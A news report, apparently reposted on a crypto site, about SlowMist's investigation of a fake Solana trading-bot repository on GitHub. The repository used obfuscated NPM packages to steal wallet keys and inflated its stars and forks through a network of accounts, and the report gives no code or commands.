A GitHub repository disguised as a legitimate Solana trading bot has been exposed, reportedly hiding malware that steals cryptocurrency.

According to a report released by blockchain security company SlowMist on Friday, the now-deleted solana-pumpfun-bot repository, hosted by the account "zldp2002," mimicked a real open-source tool to collect user credentials. The investigation was initiated by SlowMist after a user discovered their funds had been stolen on Thursday.

SlowMist stated that this malicious GitHub repository "had a relatively high number of stars and forks." Code commits across all directories were made about three weeks ago, showing obvious irregularities and a lack of consistent patterns, which, according to SlowMist, indicates that this is not a legitimate project.

The project is based on Node.js and utilizes the third-party package crypto-layout-utils as a dependency. SlowMist noted, "Upon further inspection, we found that this package has been removed from the official NPM registry."

The package can no longer be downloaded from the official Node Package Manager (NPM) registry, prompting investigators to question how the victims downloaded the package. Further investigation revealed that the attackers downloaded the library from a separate GitHub repository.

After analyzing the package, SlowMist researchers found that it used jsjiami.com.v7 for extensive obfuscation, making analysis more difficult. After deobfuscation, investigators confirmed that this was a malicious package that scans local files and uploads any detected wallet-related content or private keys to a remote server.

Further investigation by SlowMist indicated that the attackers might control a batch of GitHub accounts. These accounts were used to fork the project into malicious variants while artificially inflating the number of forks and stars to distribute the malware.

Multiple forked repositories exhibited similar characteristics, with some versions also containing another malicious package, bs58-encrypt-utils-1.0.3. This package was created on June 12, and SlowMist researchers believe the attackers have been distributing malicious NPM modules and Node.js projects since then.

This incident is the latest in a series of software supply chain attacks targeting cryptocurrency users. In recent weeks, similar schemes have attacked Firefox users through fake wallet extensions and used GitHub repositories to host code that steals credentials.

Related: What is address poisoning in cryptocurrency and how to avoid it?

Original article: “Solana Bot on GitHub Exposed for Stealing Users' Cryptocurrency”

免责声明：本文章仅代表作者个人观点，不代表本平台的立场和观点。本文章仅供信息分享，不构成对任何人的任何投资建议。用户与作者之间的任何争议，与本平台无关。如网页中刊载的文章或图片涉及侵权，请提供相关的权利证明和身份证明发送邮件到support@aicoin.com，本平台相关工作人员将会进行核查。